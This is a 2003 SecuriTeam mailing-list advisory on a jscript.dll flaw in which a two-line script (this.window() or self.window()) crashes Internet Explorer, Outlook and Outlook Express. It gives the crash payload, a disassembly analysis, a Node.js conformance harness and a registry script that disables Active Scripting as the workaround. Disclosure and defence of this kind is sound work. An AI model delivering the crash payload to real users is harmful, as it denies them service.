[NT] Microsoft's Windows Script Engine this/self.window() Security Flaw

From: SecuriTeam (support_at_securiteam.com)
Date: 05/21/03

    To: list@securiteam.com
    Date: 21 May 2003 19:21:52 +0200
    
    

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    In the US?

    Contact Beyond Security at our new California office
    housewarming rates on automated network vulnerability
    scanning. We also welcome ISPs and other resellers!

    Please contact us at: 323-882-8286 or ussales@beyondsecurity.com
    - - - - - - - - -

      Microsoft's Windows Script Engine this/self.window() Security Flaw
    ------------------------------------------------------------------------

    SUMMARY

    Microsoft Corp.'s Windows Script Engine, a component of the Windows
    operating system (OS), interprets and executes script written in VBScript
    and in JScript, Microsoft's implementation of JavaScript. Such script is
    used to add functionality to web pages and to automate tasks within the
    OS or a program. By delivering a two-line piece of JavaScript through
    Internet Explorer (IE), Outlook, or Outlook Express, a remote attacker can
    crash Internet Explorer. The bug lies in the Windows Script Engine's
    implementation of JScript, provided by jscript.dll (located in
    %SystemRoot%\system32).

    DETAILS

    Exploit:
    The following snippet of JavaScript demonstrates the bug by crashing IE on
    a vulnerable Windows system. In a browser, window.window and window.self
    are references back to the global object itself, so at the top level of a
    script this.window and self.window both evaluate to the global object,
    which is not a function. A correct engine rejects the call with a runtime
    error; this jscript.dll build dereferences a bad pointer instead:

    <script>
      this.window();
    </script>

    Or, equivalently:

    <script>
      self.window();
    </script>

    On Windows 2000, IE crashes with the following error:
    ----------------------------------------------------
    The instruction at "0x6b73aa15" referenced memory at "0x006f0063".
    The memory could not be "read".
    ----------------------------------------------------

    Disassembly of JScript.dll [5.6.08513] around the faulting instruction:
    6B73AA0A je 6B73AA25
    6B73AA0C mov eax,dword ptr [ebp-64h]
    6B73AA0F mov eax,dword ptr [eax+8]
    6B73AA12 mov ecx,dword ptr [eax]
    6B73AA14 push eax
    6B73AA15 call dword ptr [ecx+8] <--- illegal op
    6B73AA18 mov edx,dword ptr [ebp-4Ch]
    6B73AA1B push edx
    6B73AA1C call dword ptr ds:[6B773218h]
    6B73AA22 add esp,4
    6B73AA25 mov eax,dword ptr [ebp-34h]
    6B73AA28 jmp 6B7213CB
    6B73AA2D mov esi,dword ptr [ebp+18h]

    EAX is loaded with a pointer taken from the engine's local state (two
    dereferences from [ebp-64h]) and is then treated as a COM-style object:
    ECX is read from the object's first dword, where the vtable pointer is
    expected, the object is pushed as the this argument, and the third vtable
    slot ([ecx+8]) is called. The dword loaded into ECX is not a valid vtable
    pointer, so the fetch of the call target from 0x006f0063 faults before
    any code is reached. Both 16-bit halves of that address (0x006f, 0x0063)
    are small printable code units, which suggests the value was read from
    UTF-16 string data rather than from a real object, though the advisory
    does not establish where it comes from.

    Note that the advisory demonstrates a crash only: nothing here shows that
    the bogus pointer is attacker-controlled. Until that is shown, treat this
    as a remote denial of service against IE, Outlook, and Outlook Express in
    any configuration where Active Scripting runs for untrusted content.
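    What a conforming script engine does with these two expressions, as an
    added example that is not part of the advisory: the snippet below runs
    under Node.js against a constructed stand-in for the browser global object
    (makeHostGlobal, probe and runProbes are this example's own names, not
    anything from jscript.dll). It shows that window.window and self.window
    resolve to the global object itself, so calling them must raise a
    TypeError; the crash above is jscript.dll failing to reject that call.

```javascript
"use strict";

// Stand-in for the browser global object, constructed for this example.  A real
// window has window.window === window and window.self === window; those two
// self-references are all the advisory's expressions rely on.
function makeHostGlobal() {
  const host = { name: "stand-in window" };
  host.window = host;
  host.self = host;
  return host;
}

// Evaluate `expr` with `this` bound to `host` and `self` in scope, the way a
// top-level <script> sees them, and report the outcome as a string: the name
// of the error thrown, or "returned" if the call completed.
function probe(host, expr) {
  // Function() rather than eval so the `this` binding is explicit via .call().
  const fn = new Function("self", "return (" + expr + ");");
  try {
    fn.call(host, host.self);
    return "returned";
  } catch (e) {
    return e.constructor.name;
  }
}

// Run the advisory's two expressions plus a control with a callable property.
function runProbes() {
  const host = makeHostGlobal();
  const withAlert = makeHostGlobal();
  withAlert.alert = function () { return 1; };
  return {
    selfReferential: host.window === host && host.self === host,
    thisWindow: probe(host, "this.window()"),   // conforming engine: "TypeError"
    selfWindow: probe(host, "self.window()"),   // conforming engine: "TypeError"
    control: probe(withAlert, "this.alert()"),  // "returned"
  };
}

console.log(runProbes());
```

    The control probe matters: it shows the harness itself is not what throws,
    and that the only difference between a safe call and the advisory's is
    whether the property being called is a function. An engine that faults
    instead of throwing on the non-function case is failing a basic type check
    in its call path, which is the bug the disassembly above shows.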

    Possible Solution:
    Disable Active Scripting for the zone in which untrusted content is
    rendered. In Internet Explorer this is Internet Options > Security >
    select the Internet zone > Custom Level > Active scripting > Disable.
    Outlook and Outlook Express should render HTML mail in the Restricted
    sites zone, where Active Scripting is already disabled by default.
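    One way to apply this workaround on the affected systems, added here as an
    example rather than taken from the advisory: a Windows Script Host JScript
    file that sets the Internet zone's Active scripting action to Disable
    through the registry. It assumes per-user zone settings under HKCU (the
    Zones\<zone> path, the 1400 action id and the 0/1/3 values are IE's
    documented zone layout; the function names are this example's own). Run it
    with cscript; under Node.js it only computes the change and writes nothing.

```javascript
// Added example, not part of the advisory: script the "Disable Active Scripting"
// workaround for the Internet zone through the Windows Script Host, as one would
// on the Windows 2000 / IE 5.x-6 systems the advisory covers.  Run with
// `cscript harden-zone.js` (the file name is arbitrary).  Under other engines
// (e.g. Node.js) it only computes what it would write.
//
// Registry layout (per-user): HKCU\Software\Microsoft\Windows\CurrentVersion\
// Internet Settings\Zones\<zone>, where DWORD 1400 is the Active scripting
// action: 0 = Enable, 1 = Prompt, 3 = Disable.  Assumption: the machine keeps
// zone settings per user; if it enforces HKLM-only zone policy, use HKLM.

var ZONE_ACTIVE_SCRIPTING = "1400";
var ZONE_NAMES = ["Local machine", "Local intranet", "Trusted sites", "Internet", "Restricted sites"];
var MODES = { Enable: 0, Prompt: 1, Disable: 3 };

// Registry key for one of IE's five URL security zones (0..4).
function zoneKey(zone) {
  if (!(zone >= 0 && zone <= 4)) { throw new Error("unknown zone: " + zone); }
  return "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\" + zone + "\\";
}

// Full path of the Active scripting value inside that zone key.
function activeScriptingPath(zone) {
  return zoneKey(zone) + ZONE_ACTIVE_SCRIPTING;
}

// Human-readable name for a 1400 value (used for the before/after report).
function modeName(value) {
  for (var name in MODES) { if (MODES[name] === value) { return name; } }
  return "unknown (" + value + ")";
}

// The change this script makes, as data: the weak default for the Internet
// zone (Enable) beside the hardened value the advisory recommends (Disable).
function hardeningPlan() {
  return {
    zone: 3,
    zoneName: ZONE_NAMES[3],
    path: activeScriptingPath(3),
    weak: MODES.Enable,
    hardened: MODES.Disable
  };
}

// Read the current value through WScript.Shell; null when the value is absent
// (IE then uses its built-in default, Enable for the Internet zone) or when
// not running under WSH at all.
function readActiveScripting(zone) {
  if (typeof WScript === "undefined") { return null; }
  var sh = new ActiveXObject("WScript.Shell");
  try { return sh.RegRead(activeScriptingPath(zone)); } catch (e) { return null; }
}

// Write the hardened value and read it back; returns true only if the
// read-back confirms the change.  Returns false outside WSH (no write made).
function applyHardening() {
  if (typeof WScript === "undefined") { return false; }
  var p = hardeningPlan();
  var sh = new ActiveXObject("WScript.Shell");
  var before = readActiveScripting(p.zone);
  sh.RegWrite(p.path, p.hardened, "REG_DWORD");
  var after = readActiveScripting(p.zone);
  WScript.Echo(p.zoneName + " zone Active scripting: " +
               modeName(before === null ? p.weak : before) + " -> " + modeName(after));
  return after === p.hardened;
}

applyHardening();
```

    After running it, confirm in Internet Options > Security > Custom Level
    that Active scripting reads Disable for the Internet zone. This breaks
    script on every Internet-zone site, so sites that genuinely need it should
    be moved to the Trusted sites zone rather than re-enabling it globally.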

    ADDITIONAL INFORMATION

    The information has been provided by Gregory R. Panakkal
    (junkcode@gmx.net).

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

